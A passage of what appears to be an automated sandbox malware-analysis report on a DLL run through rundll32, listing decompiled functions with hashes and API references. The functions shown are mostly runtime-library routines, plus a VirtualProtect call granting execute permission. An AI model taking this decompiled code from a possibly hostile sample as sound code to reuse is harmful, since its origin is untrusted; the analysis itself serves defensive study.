                                                      • Instruction ID: 6e82114eb995b75448db5da2aecd5bb4f4914dcc2496e0f34239341086ba53e0
                                                      • Opcode Fuzzy Hash: f80fd0cc294c73ebe03407b403bc5a54cea020a6d4845df898b204dede89eab9
                                                      • Instruction Fuzzy Hash: 96E0E512E0981106EE31DAFABE05A9B12591B9F37BB120776D564CE1F4EBA04406059A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7BC57F, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::ios_base::_Init.LIBCPMT ref: 6E7BC585
                                                        • Part of subcall function 6E7BC2CB: __EH_prolog3.LIBCMT ref: 6E7BC2D2
                                                        • Part of subcall function 6E7BC2CB: std::locale::_Init.LIBCPMT ref: 6E7BC31B
                                                        • Part of subcall function 6E7BCC5F: __EH_prolog3.LIBCMT ref: 6E7BCC66
                                                      • std::ios_base::_Addstd.LIBCPMT ref: 6E7BC5BD
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3Initstd::ios_base::_$Addstdstd::locale::_
                                                      • String ID:
                                                      • API String ID: 1307134795-0
                                                      • Opcode ID: f109fcccf92e5ba1389d491efb877153b0f87ccd2512f5596415f96663163391
                                                      • Instruction ID: a531eac7a86b515f3775db359778f8c4446598c1f1e93750f04b813a8e745db0
                                                      • Opcode Fuzzy Hash: f109fcccf92e5ba1389d491efb877153b0f87ccd2512f5596415f96663163391
                                                      • Instruction Fuzzy Hash: 47F0E5311047546BEB209EE1D648BC77BD8AF00735F108C1EE5824B691CBB5F4448BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7BBC54, Relevance: 3.0, APIs: 2, Instructions: 24COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7BBC5B
                                                      • std::locale::_Init.LIBCPMT ref: 6E7BBC7C
                                                        • Part of subcall function 6E7BD2D3: __EH_prolog3.LIBCMT ref: 6E7BD2DA
                                                        • Part of subcall function 6E7BD2D3: std::_Lockit::_Lockit.LIBCPMT ref: 6E7BD2E5
                                                        • Part of subcall function 6E7BD2D3: std::locale::_Setgloballocale.LIBCPMT ref: 6E7BD300
                                                        • Part of subcall function 6E7BD2D3: _Yarn.LIBCPMT ref: 6E7BD316
                                                        • Part of subcall function 6E7BD2D3: std::_Lockit::~_Lockit.LIBCPMT ref: 6E7BD356
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
                                                      • String ID:
                                                      • API String ID: 3152668004-0
                                                      • Opcode ID: d8213ce3a92bf140fab25923829fda40725660b82c0b6c5812f0fb1ba3016794
                                                      • Instruction ID: 3b79a4c64b23a08518876f46aaffebd47eb649a02c992f1dfec2e9b179d5dc45
                                                      • Opcode Fuzzy Hash: d8213ce3a92bf140fab25923829fda40725660b82c0b6c5812f0fb1ba3016794
                                                      • Instruction Fuzzy Hash: B0E0DF72A05A125BD2148FE8CB0C3ECA258AF40B14F914C1AE4019F6A0DFF098095BD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77A05B, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E6E77A05B(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t7;
				void* _t9;

				_t1 = E6E77B18A(__ecx, __eflags, E6E779F69); // executed
				 *0x6e78c020 = _t1;
				_pop(_t7);
				if(_t1 != 0xffffffff) {
					_t2 = E6E77B23B(_t7, __eflags, _t1, 0x6e78cccc);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E6E77A08E(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}







                                                      0x6e77a060
                                                      0x6e77a065
                                                      0x6e77a06a
                                                      0x6e77a06e
                                                      0x6e77a079
                                                      0x6e77a07f
                                                      0x6e77a080
                                                      0x6e77a082
                                                      0x6e77a08d
                                                      0x6e77a084
                                                      0x6e77a084
                                                      0x00000000
                                                      0x6e77a084
                                                      0x6e77a070
                                                      0x6e77a070
                                                      0x6e77a072
                                                      0x6e77a072

                                                      APIs
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E77A079
                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 6E77A084
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                      • String ID:
                                                      • API String ID: 1660781231-0
                                                      • Opcode ID: ad169e1f1cb741fb01113a1e3165436e1c3d540f9ae5ff09ed7d55e3cd49feee
                                                      • Instruction ID: 0e31390dd7422de2dcfaab67c634929271e7186e45efc63d41054a7fdbd38cc6
                                                      • Opcode Fuzzy Hash: ad169e1f1cb741fb01113a1e3165436e1c3d540f9ae5ff09ed7d55e3cd49feee
                                                      • Instruction Fuzzy Hash: D5D0A931818601183D242EF47F1808B235CA9133BD3600FB6D0208E6F4FB24C002999B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7D8981, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E7D9C13: try_get_function.LIBVCRUNTIME ref: 6E7D9C28
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E7D899F
                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 6E7D89AA
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                      • String ID:
                                                      • API String ID: 806969131-0
                                                      • Opcode ID: e3ef6db01cbcb2e943873b9841fab8a3100f04c0aed3a793f18b7be9e4c92df3
                                                      • Instruction ID: daffdf83e54b53c199c315b3b2fb5c3c079a2f8978c8ad65902c492b45a43b10
                                                      • Opcode Fuzzy Hash: e3ef6db01cbcb2e943873b9841fab8a3100f04c0aed3a793f18b7be9e4c92df3
                                                      • Instruction Fuzzy Hash: 9AD0232141C701583D406EF427545C517EC551337C3903F97C0548D3F0EF11400CE553
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7967F0, Relevance: 1.7, APIs: 1, Instructions: 158memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualProtect.KERNEL32(6E856C9C,0000312B,00000040,6E856C90), ref: 6E796864
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 7c10d66a95374d15ef12ec8d2533b97f4c35c54613b05e52eaf3da877b5d9b8a
                                                      • Instruction ID: b5a6693a4bcbd9a9448e4fa11f782f25b62c1b8e9ebdc6f05fe4bc00adb113b2
                                                      • Opcode Fuzzy Hash: 7c10d66a95374d15ef12ec8d2533b97f4c35c54613b05e52eaf3da877b5d9b8a
                                                      • Instruction Fuzzy Hash: 8761AFB1D04567DFCB14DFA9D691AB8BFF0FB0A305B0402AED499D3291E7389610DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FC3A3, Relevance: 1.6, APIs: 1, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 6E7FC410
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: __crt_fast_encode_pointer
                                                      • String ID:
                                                      • API String ID: 3768137683-0
                                                      • Opcode ID: 20f376ae8c39deaa5703d4b8df2f69620a20377f2b17e528ccb8cc549d2e12e8
                                                      • Instruction ID: 61371993ea276ad33818d5290cbea6a08726a387aa4aab99da919e96ff277b1a
                                                      • Opcode Fuzzy Hash: 20f376ae8c39deaa5703d4b8df2f69620a20377f2b17e528ccb8cc549d2e12e8
                                                      • Instruction Fuzzy Hash: 49110433A00926CF9F26DEADDA504AA7796DB852A17024220ED25AF358DA30DC03CAD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E773C02, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E6E773C02(intOrPtr __ecx, void* __eflags) {
				signed char _t43;
				intOrPtr _t46;
				signed int* _t47;
				signed int* _t48;
				void* _t49;

				_push(0x10);
				E6E784397();
				_t46 = __ecx;
				 *((intOrPtr*)(_t49 - 0x14)) = __ecx;
				_t43 = 0;
				 *((intOrPtr*)(_t49 - 4)) = 0;
				 *((intOrPtr*)(_t49 - 0x10)) = 0;
				_t48 =  *(_t49 + 8);
				_t45 = _t48;
				 *_t48 = 0;
				_t48[1] = 0;
				E6E774829(_t48,  *((intOrPtr*)(__ecx + 4)),  *((intOrPtr*)(_t49 + 0x10)),  *((intOrPtr*)(_t49 + 0xc)),  *((intOrPtr*)(_t49 + 0x14)),  *((intOrPtr*)(_t49 + 0x18)), __ecx, __ecx); // executed
				 *((intOrPtr*)(_t49 - 4)) = 0;
				 *((intOrPtr*)(_t49 - 0x10)) = 1;
				while( *_t48 == 0) {
					if((_t43 & 0x000000ff) <  *((intOrPtr*)(_t49 + 0x24))) {
						_t47 = E6E774829(_t49 - 0x1c,  *((intOrPtr*)(_t46 + 4)),  *((intOrPtr*)(_t49 + 0x10)),  *((intOrPtr*)(_t49 + 0xc)),  *((intOrPtr*)(_t49 + 0x14)),  *((intOrPtr*)(_t49 + 0x18)), _t49 - 0x1c, _t45);
						 *((intOrPtr*)(_t49 - 4)) = 1;
						if( *_t48 != 0) {
							_t21 = E6E77111C() + 4; // 0x4
							_t45 = _t21;
							E6E778517(_t21, _t47,  *_t48);
						}
						 *_t48 =  *_t47;
						_t48[1] = _t47[1];
						 *_t47 =  *_t47 & 0x00000000;
						_t47[1] = _t47[1] & 0x00000000;
						 *((intOrPtr*)(_t49 - 4)) = 2;
						if( *((intOrPtr*)(_t49 - 0x1c)) != 0) {
							_t29 = E6E77111C() + 4; // 0x4
							_t45 = _t29;
							E6E778517(_t29, _t47,  *((intOrPtr*)(_t49 - 0x1c)));
						}
						_t46 =  *((intOrPtr*)(_t49 - 0x14));
						_t43 = _t43 + 1;
						 *((char*)(_t49 - 4)) = 0;
						continue;
					}
					break;
				}
				E6E784371();
				return _t48;
			}








                                                      0x6e773c02
                                                      0x6e773c09
                                                      0x6e773c0e
                                                      0x6e773c10
                                                      0x6e773c18
                                                      0x6e773c1d
                                                      0x6e773c23
                                                      0x6e773c26
                                                      0x6e773c29
                                                      0x6e773c2e
                                                      0x6e773c30
                                                      0x6e773c36
                                                      0x6e773c3b
                                                      0x6e773c3e
                                                      0x6e773cbc
                                                      0x6e773c4d
                                                      0x6e773c68
                                                      0x6e773c6a
                                                      0x6e773c74
                                                      0x6e773c7d
                                                      0x6e773c7d
                                                      0x6e773c80
                                                      0x6e773c80
                                                      0x6e773c87
                                                      0x6e773c8c
                                                      0x6e773c8f
                                                      0x6e773c92
                                                      0x6e773c96
                                                      0x6e773ca1
                                                      0x6e773cab
                                                      0x6e773cab
                                                      0x6e773cae
                                                      0x6e773cae
                                                      0x6e773cb3
                                                      0x6e773cb6
                                                      0x6e773cb8
                                                      0x00000000
                                                      0x6e773cb8
                                                      0x00000000
                                                      0x6e773c4d
                                                      0x6e773cc3
                                                      0x6e773cc8

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3
                                                      • String ID:
                                                      • API String ID: 431132790-0
                                                      • Opcode ID: 4444b759c50bc816e58c513e499c301b1677c82afc749e4f26a3cccec3bc5185
                                                      • Instruction ID: 2931526e22b55f657f07062ee003a4daac5e88353e17e16162a6456737afc746
                                                      • Opcode Fuzzy Hash: 4444b759c50bc816e58c513e499c301b1677c82afc749e4f26a3cccec3bc5185
                                                      • Instruction Fuzzy Hash: CC21E9B080020AEFDF118F94CA49BEEBBB5FF14304F108829E454676A0D7B59E65EB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77D795, Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E6E77D795(signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t14;
				signed int* _t20;
				signed int _t22;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				_Unknown_base(*)()* _t36;

				_t20 = 0x6e78cf10 + _a4 * 4;
				_t28 =  *0x6e78c00c; // 0x9bbef7a8
				_t31 = _t30 | 0xffffffff;
				_t29 = _t28 ^  *_t20;
				_t22 = _t28 & 0x0000001f;
				asm("ror edx, cl");
				if(_t29 != _t31) {
					if(_t29 == 0) {
						_t11 = E6E77D6CE(_t22, _a12, _a16); // executed
						if(_t11 == 0) {
							L7:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t31 ^  *0x6e78c00c;
							_t14 = 0;
							L8:
							return _t14;
						}
						_t36 = GetProcAddress(_t11, _a8);
						if(_t36 == 0) {
							goto L7;
						}
						 *_t20 = E6E77CCD9(_t36);
						_t14 = _t36;
						goto L8;
					}
					return _t29;
				}
				return 0;
			}












                                                      0x6e77d79f
                                                      0x6e77d7a9
                                                      0x6e77d7af
                                                      0x6e77d7b4
                                                      0x6e77d7b6
                                                      0x6e77d7b9
                                                      0x6e77d7bd
                                                      0x6e77d7c5
                                                      0x6e77d7d2
                                                      0x6e77d7db
                                                      0x6e77d7fa
                                                      0x6e77d7ff
                                                      0x6e77d807
                                                      0x6e77d80f
                                                      0x6e77d811
                                                      0x6e77d813
                                                      0x00000000
                                                      0x6e77d813
                                                      0x6e77d7e7
                                                      0x6e77d7eb
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77d7f4
                                                      0x6e77d7f6
                                                      0x00000000
                                                      0x6e77d7f6
                                                      0x00000000
                                                      0x6e77d7c7
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 738db9fdfeb381ceec2b2d059358ce558e1d690e7e4e4c5c36921b5d8cb77dce
                                                      • Instruction ID: 6cdbe560001e4db71fa16ea0e3e7b322d8f6b64d0177d749f6bbb993ae55e71b
                                                      • Opcode Fuzzy Hash: 738db9fdfeb381ceec2b2d059358ce558e1d690e7e4e4c5c36921b5d8cb77dce
                                                      • Instruction Fuzzy Hash: CB01F9377006119FAF218DADEE40987339AABC77703258534F605CB158EB31D4018FD6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E780D9D, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E6E780D9D(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E6E77D5E9(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E6E77D976(__eflags, _t4, 0xfa0, 0); // executed
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E6E77D646(0);
				return _t35;
			}









                                                      0x6e780da3
                                                      0x6e780daa
                                                      0x6e780daf
                                                      0x6e780db3
                                                      0x6e780dba
                                                      0x6e780dc0
                                                      0x6e780dc0
                                                      0x6e780dc6
                                                      0x6e780dc8
                                                      0x6e780dcb
                                                      0x6e780dcb
                                                      0x6e780dce
                                                      0x6e780dd0
                                                      0x6e780dd6
                                                      0x6e780dda
                                                      0x6e780ddf
                                                      0x6e780de3
                                                      0x6e780de5
                                                      0x6e780de8
                                                      0x6e780dee
                                                      0x6e780df5
                                                      0x6e780df9
                                                      0x6e780dfd
                                                      0x6e780e00
                                                      0x6e780e03
                                                      0x6e780e03
                                                      0x6e780e07
                                                      0x6e780e0a
                                                      0x6e780dbc
                                                      0x6e780dbc
                                                      0x6e780dbc
                                                      0x6e780e0c
                                                      0x6e780e17

                                                      APIs
                                                        • Part of subcall function 6E77D5E9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E77F07A,00000001,00000364,00000005,000000FF,?,00000001,6E77D5A0,6E77D66C,?,?,6E77CED9), ref: 6E77D62A
                                                      • _free.LIBCMT ref: 6E780E0C
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: 69efef760e2343185229621ae8949d6bc28807d77cde58e897143a8977b81d6a
                                                      • Instruction ID: 601a7f274a0e8513d72fb6dc4b453b744466f7a00d2adfce9feba7ac45dc0447
                                                      • Opcode Fuzzy Hash: 69efef760e2343185229621ae8949d6bc28807d77cde58e897143a8977b81d6a
                                                      • Instruction Fuzzy Hash: 7F0104726043166BD7318F98C88498BFB98FB053B0F000A29E545A76C0E7706900CFE4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E80994E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E7F9456: RtlAllocateHeap.NTDLL(00000008,6E849074,00000000), ref: 6E7F9497
                                                      • _free.LIBCMT ref: 6E8099BA
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: 481109e00bee23d3dfa8c49717c5ac012cb26a606e9915d821d446f6e5b2ae20
                                                      • Instruction ID: b60b8632275725c1e2300c0400e401519fb0bfd888b6de35faef220172119342
                                                      • Opcode Fuzzy Hash: 481109e00bee23d3dfa8c49717c5ac012cb26a606e9915d821d446f6e5b2ae20
                                                      • Instruction Fuzzy Hash: 8F01D676644305ABE321CFA99C4599AFBEDEBC9370F25091DE694833C0EB30A9068664
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FCC00, Relevance: 1.5, APIs: 1, Instructions: 47COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00000000,9F418D08,00000001,00000000,00000000), ref: 6E7FCC71
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: String
                                                      • String ID:
                                                      • API String ID: 2568140703-0
                                                      • Opcode ID: 42b00eb8549a663fb396add95bc7021a61717ebd9cb6d319148b21572388ceb0
                                                      • Instruction ID: d28e69194aec60ff753becfa485c204e2142731f05f44617cb569c265986120f
                                                      • Opcode Fuzzy Hash: 42b00eb8549a663fb396add95bc7021a61717ebd9cb6d319148b21572388ceb0
                                                      • Instruction Fuzzy Hash: 7C01D33254010AFBCF069FE1DE05DEE7F66EF49355F044554FE182A260CA328932EB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77D5E9, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E77D5E9(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6e78d338, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6E780C1F();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6E77D59B(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E6E7807D7(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}







                                                      0x6e77d5ef
                                                      0x6e77d5f4
                                                      0x6e77d602
                                                      0x6e77d602
                                                      0x6e77d608
                                                      0x6e77d60a
                                                      0x6e77d60a
                                                      0x6e77d621
                                                      0x6e77d62a
                                                      0x6e77d632
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77d612
                                                      0x6e77d614
                                                      0x6e77d636
                                                      0x6e77d63b
                                                      0x6e77d641
                                                      0x00000000
                                                      0x6e77d641
                                                      0x6e77d61d
                                                      0x6e77d61f
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77d61f
                                                      0x00000000
                                                      0x6e77d621
                                                      0x6e77d5fa
                                                      0x6e77d600
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E77F07A,00000001,00000364,00000005,000000FF,?,00000001,6E77D5A0,6E77D66C,?,?,6E77CED9), ref: 6E77D62A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: d479700bf8cdd466efcebd8aee553ce1550e957cd925c6c795edbdc4e162efb3
                                                      • Instruction ID: 1a097213ee2169f29fa47e1bff8bb6f8071f4f9d77fd14308cc2e6a91635daea
                                                      • Opcode Fuzzy Hash: d479700bf8cdd466efcebd8aee553ce1550e957cd925c6c795edbdc4e162efb3
                                                      • Instruction Fuzzy Hash: 4EF0903164D6256AAF714EE69E18B9B374C9F536E0F114031EA1CD64A8EB60D8018EE9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F9456, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,6E849074,00000000), ref: 6E7F9497
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 28434305d96e2d3efadac340463a64b16e7e43f8395de09c093f4930a349c5db
                                                      • Instruction ID: b6a42fa1914f9d7056250c16a286aa2e535efc15dcbfcf05e82e7b1451646c04
                                                      • Opcode Fuzzy Hash: 28434305d96e2d3efadac340463a64b16e7e43f8395de09c093f4930a349c5db
                                                      • Instruction Fuzzy Hash: D0F02431245669EBEF515EFACA05AAB774CAFB2370B008121E814A63A0DB30D4038AE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F8087, Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E7F9456: RtlAllocateHeap.NTDLL(00000008,6E849074,00000000), ref: 6E7F9497
                                                      • _free.LIBCMT ref: 6E7F80A7
                                                        • Part of subcall function 6E7F99B6: HeapFree.KERNEL32(00000000,00000000), ref: 6E7F99CC
                                                        • Part of subcall function 6E7F99B6: GetLastError.KERNEL32(6E849074,?,6E805750,6E849074,00000000,6E849074,00000000,?,6E805A55,6E849074,00000007,6E849074,?,6E804DF4,6E849074,6E849074), ref: 6E7F99DE
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateErrorFreeLast_free
                                                      • String ID:
                                                      • API String ID: 314386986-0
                                                      • Opcode ID: e1fff2bc1833c621ae68f332f8c6eb93132ee9efebf5819667583eda16930842
                                                      • Instruction ID: 1f64454c7427e10b38d9c484e1e17b5b1226c82ea1f90741d79ff8e66602c1b5
                                                      • Opcode Fuzzy Hash: e1fff2bc1833c621ae68f332f8c6eb93132ee9efebf5819667583eda16930842
                                                      • Instruction Fuzzy Hash: DBF03C72E00609AFD710DFA9D541B9AB7F8EB48710F104166ED28E7340EB71AA118BD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

